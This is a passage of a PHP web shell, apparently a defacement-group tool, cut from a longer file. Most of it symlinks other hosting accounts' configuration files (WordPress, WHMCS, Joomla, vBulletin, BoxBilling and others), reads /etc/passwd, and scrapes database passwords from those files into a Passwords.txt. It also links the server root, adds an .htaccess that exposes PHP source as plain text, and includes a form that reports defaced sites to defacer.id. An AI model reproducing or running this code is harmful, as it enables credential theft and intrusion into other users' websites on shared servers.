1828. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
1829. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
1830. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
1831. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
1832. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
1833. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
1834. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
1835. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
1836. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
1837. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
1838.  
1839. //Home4
1840.  
1841. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
1842. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
1843. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
1844. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
1845. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
1846. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
1847. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
1848. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
1849. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
1850. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
1851. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
1852. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
1853. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
1854. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
1855. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
1856. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
1857. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
1858. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
1859. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
1860. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
1861. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
1862. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
1863. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
1864. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
1865. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
1866. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
1867. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
1868. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
1869. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
1870. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
1871. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
1872. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
1873. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
1874. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
1875. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
1876. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
1877. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
1878. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
1879. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
1880. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
1881. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
1882. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
1883. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
1884. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
1885. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
1886. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
1887. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
1888. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
1889. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
1890. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1891. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1892. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
1893. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
1894. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
1895. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
1896. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
1897. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
1898. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
1899. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
1900. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
1901. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
1902. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
1903. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
1904. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
1905. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
1906. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
1907. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
1908. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
1909. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
1910. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
1911. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
1912. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
1913. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
1914. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
1915. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
1916. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
1917. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
1918. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
1919. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
1920. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
1921. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
1922. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
1923. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
1924. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
1925. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
1926. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
1927. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
1928. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
1929. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
1930. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
1931. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
1932. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
1933. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
1934. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
1935. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
1936. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
1937. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
1938. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
1939. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
1940. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1941. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1942. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1943. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
1944. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
1945. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
1946. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
1947. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
1948. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
1949. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
1950. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
1951. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
1952. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
1953. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
1954. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
1955. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
1956. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
1957. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
1958. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
1959. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
1960. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
1961. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
1962. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
1963. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
1964. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
1965. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
1966. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
1967. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1968. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1969. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1970. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
1971. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
1972. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
1973. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
1974. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
1975. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
1976. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
1977. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
1978. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
1979. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
1980. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
1981. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
1982. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
1983. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
1984. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
1985. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
1986. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
1987. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
1988. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
1989. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
1990. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
1991. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
1992. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
1993. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
1994. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
1995. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
1996. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
1997. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
1998. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
1999. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
2000. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
2001. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
2002. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
2003. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
2004. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
2005. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
2006. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
2007. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
2008. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
2009. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
2010. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
2011. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
2012. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
2013. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
2014. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
2015. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
2016. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
2017. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
2018. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
2019. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
2020. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
2021.  
2022. }
2023.  
2024. //password grab
2025.  
2026. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
2027. {
2028.  
2029. $ar0=explode($marqueurDebutLien, $text);
2030. $ar1=explode($marqueurFinLien, $ar0[1]);
2031. $ar=trim($ar1[0]);
2032. return $ar;
2033. }
2034.  
2035. $ffile=fopen('Passwords.txt','a+');
2036.  
2037.  
2038. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/iki_config_dancok/";
2039. $re=$r;
2040. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
2041.  
2042. $users=file("/etc/passwd");
2043. foreach($users as $user)
2044. {
2045.  
2046. $str=explode(":",$user);
2047. $usersss=$str[0];
2048. foreach($confi as $co)
2049. {
2050.  
2051.  
2052. $uurl=$re.$usersss.$co;
2053. $uel=$uurl;
2054.  
2055. $ch = curl_init();
2056.  
2057. curl_setopt($ch, CURLOPT_URL, $uel);
2058. curl_setopt($ch, CURLOPT_HEADER, 1);
2059. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2060. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
2061. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
2062. $result['EXE'] = curl_exec($ch);
2063. curl_close($ch);
2064. $uxl=$result['EXE'];
2065.  
2066.  
2067. if($uxl && preg_match('/table_prefix/i',$uxl))
2068. {
2069.  
2070. //Wordpress
2071.  
2072. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
2073. if(!empty($dbp))
2074. $pass=$dbp."\n";
2075. fwrite($ffile,$pass);
2076.  
2077. }
2078. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
2079. {
2080.  
2081. //WHMCS
2082.  
2083. $dbp=entre2v2($uxl,"db_password = '","';");
2084. if(!empty($dbp))
2085. $pass=$dbp."\n";
2086. fwrite($ffile,$pass);
2087.  
2088. }
2089.  
2090.  
2091. elseif($uxl && preg_match('/dbprefix/i',$uxl))
2092. {
2093.  
2094. //Joomla
2095.  
2096. $db=entre2v2($uxl,"password = '","';");
2097. if(!empty($db))
2098. $pass=$db."\n";
2099. fwrite($ffile,$pass);
2100. }
2101. elseif($uxl && preg_match('/admincpdir/i',$uxl))
2102. {
2103.  
2104. //Vbulletin
2105.  
2106. $db=entre2v2($uxl,"password'] = '","';");
2107. if(!empty($db))
2108. $pass=$db."\n";
2109. fwrite($ffile,$pass);
2110.  
2111. }
2112. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
2113. {
2114.  
2115. //Other
2116.  
2117. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
2118. if(!empty($db))
2119. $pass=$db."\n";
2120. fwrite($ffile,$pass);
2121. }
2122. elseif($uxl && preg_match('/dbpass/i',$uxl))
2123. {
2124.  
2125. //Other
2126.  
2127. $db=entre2v2($uxl,"dbpass = '","';");
2128. if(!empty($db))
2129. $pass=$db."\n";
2130. fwrite($ffile,$pass);
2131. }
2132. elseif($uxl && preg_match('/dbpass/i',$uxl))
2133. {
2134.  
2135. //Other
2136.  
2137. $db=entre2v2($uxl,"dbpass = '","';");
2138. if(!empty($db))
2139. $pass=$db."\n";
2140. fwrite($ffile,$pass);
2141.  
2142. }
2143. elseif($uxl && preg_match('/dbpass/i',$uxl))
2144. {
2145.  
2146. //Other
2147.  
2148. $db=entre2v2($uxl,"dbpass = \"","\";");
2149. if(!empty($db))
2150. $pass=$db."\n";
2151. fwrite($ffile,$pass);
2152. }
2153.  
2154.  
2155. }
2156. }
2157. echo "<center>
2158. <a href=\"iki_config_dancok/root/\">Root Server</a>
2159. <br><a href=\"iki_config_dancok/Passwords.txt\">Passwords</a>
2160. <br><a href=\"iki_config_dancok/\">Configurations</a></center>";
2161. }
2162. else
2163. {
2164. echo "<center>
2165. <form method=\"POST\">
2166. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
2167. $file = '/etc/passwd';
2168. $read = @fopen($file, 'r');
2169. if ($read){
2170. $body = @fread($read, @filesize($file));
2171. echo "".htmlentities($body)."";
2172. }
2173. elseif(!$read)
2174. {
2175. $read = @show_source($file) ;
2176. }
2177. elseif(!$read)
2178. {
2179. $read = @highlight_file($file);
2180. }
2181. elseif(!$read)
2182. {
2183. for($uid=0;$uid<1000;$uid++)
2184. {
2185. $ara = posix_getpwuid($uid);
2186. if (!empty($ara))
2187. {
2188. while (list ($key, $val) = each($ara))
2189. {
2190. print "$val:";
2191. }
2192. print "\n";
2193. }}}
2194.  
2195. flush();
2196.  
2197. echo "</textarea>
2198. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
2199. </form></center>";
2200. }
2201. }
2202. }
2203. elseif($_GET['do'] == 'symlink') {
2204. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
2205. $d0mains = @file("/etc/named.conf");
2206. ##httaces
2207. if($d0mains){
2208. @mkdir("isi_sempak",0777);
2209. @chdir("isi_sempak");
2210. @exe("ln -s / root");
2211. $file3 = 'Options Indexes FollowSymLinks
2212. DirectoryIndex AZZATSSINS.htm
2213. AddType text/plain .php
2214. AddHandler text/plain .php
2215. Satisfy Any';
2216. $fp3 = fopen('.htaccess','w');
2217. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
2218. echo "
2219. <table align=center border=1 style='width:60%;border-color:#333333;'>
2220. <tr>
2221. <td align=center><font size=2>S. No.</font></td>
2222. <td align=center><font size=2>Domains</font></td>
2223. <td align=center><font size=2>Users</font></td>
2224. <td align=center><font size=2>Symlink</font></td>
2225. </tr>";
2226. $dcount = 1;
2227. foreach($d0mains as $d0main){
2228. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
2229. flush();
2230. if(strlen(trim($domains[1][0])) > 2){
2231. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2232. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
2233. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
2234. <td>".$user['name']."</td>
2235. <td><a href='$full/isi_sempak/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
2236. flush();
2237. $dcount++;}}}
2238. echo "</table>";
2239. }else{
2240. $TEST=@file('/etc/passwd');
2241. if ($TEST){
2242. @mkdir("isi_sempak",0777);
2243. @chdir("isi_sempak");
2244. exe("ln -s / root");
2245. $file3 = 'Options Indexes FollowSymLinks
2246. DirectoryIndex AZZATSSINS.htm
2247. AddType text/plain .php
2248. AddHandler text/plain .php
2249. Satisfy Any';
2250.  $fp3 = fopen('.htaccess','w');
2251.  $fw3 = fwrite($fp3,$file3);
2252.  @fclose($fp3);
2253.  echo "
2254. <table align=center border=1><tr>
2255. <td align=center><font size=3>S. No.</font></td>
2256. <td align=center><font size=3>Users</font></td>
2257. <td align=center><font size=3>Symlink</font></td></tr>";
2258.  $dcount = 1;
2259.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
2260.  while(!feof($file)){
2261.  $s = fgets($file);
2262.  $matches = array();
2263.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2264.  $matches = str_replace("home/","",$matches[1]);
2265.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2266.  continue;
2267.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
2268. <td align=center><font class=txt>" . $matches . "</td>";
2269.  echo "<td align=center><font class=txt><a href=$full/isi_sempak/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2270.  $dcount++;}fclose($file);
2271.  echo "</table>";}else{if($os != "Windows"){@mkdir("isi_sempak",0777);@chdir("isi_sempak");@exe("ln -s / root");$file3 = '
2272. Options Indexes FollowSymLinks
2273. DirectoryIndex AZZATSSINS.htm
2274. AddType text/plain .php
2275. AddHandler text/plain .php
2276. Satisfy Any
2277. ';
2278.  $fp3 = fopen('.htaccess','w');
2279.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
2280.  echo "
2281. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
2282. <table align=center border=1><tr>
2283. <td align=center><font size=3>ID</font></td>
2284. <td align=center><font size=3>Users</font></td>
2285. <td align=center><font size=3>Symlink</font></td></tr>";
2286.  $temp = "";$val1 = 0;$val2 = 1000;
2287.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
2288.  if ($uid)$temp .= join(':',$uid)."\n";}
2289.  echo '<br/>';$temp = trim($temp);$file5 =
2290.  fopen("test.txt","w");
2291.  fputs($file5,$temp);
2292.  fclose($file5);$dcount = 1;$file =
2293.  fopen("test.txt", "r") or exit("Unable to open file!");
2294.  while(!feof($file)){$s = fgets($file);$matches = array();
2295.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
2296.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2297.  continue;
2298.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
2299. <td align=center><font class=txt>" . $matches . "</td>";
2300.  echo "<td align=center><font class=txt><a href=$full/isi_sempak/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2301.  $dcount++;}
2302.  fclose($file);
2303.  echo "</table></div></center>";unlink("test.txt");
2304.  } else
2305.  echo "<center><font size=3>Cannot create Symlink</font></center>";
2306.  }
2307.  }    
2308. }
2309. elseif($_GET['do'] == 'defacerid') {
2310. echo "<center><form method='post'>
2311.         <u>Defacer</u>: <br>
2312.         <input type='text' name='hekel' size='50' value='AZZATSSINS'><br>
2313.         <u>Team</u>: <br>
2314.         <input type='text' name='tim' size='50' value='Eldersc0de Family'><br>
2315.         <u>Domains</u>: <br>
2316.         <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
2317.         <input type='submit' name='go' value='Submit' style='width: 450px;'>
2318.         </form>";
2319. $site = explode("\r\n", $_POST['sites']);
2320. $go = $_POST['go'];
2321. $hekel = $_POST['hekel'];
2322. $tim = $_POST['tim'];
2323. if($go) {
2324. foreach($site as $sites) {
2325. $zh = $sites;
2326. $form_url = "https://www.defacer.id/notify";
2327. $data_to_post = array();
2328. $data_to_post['attacker'] = "$hekel";
2329. $data_to_post['team'] = "$tim";
2330. $data_to_post['poc'] = 'SQL Injection';
2331. $data_to_post['url'] = "$zh";
2332. $curl = curl_init();
2333. curl_setopt($curl,CURLOPT_URL, $form_url);
2334. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
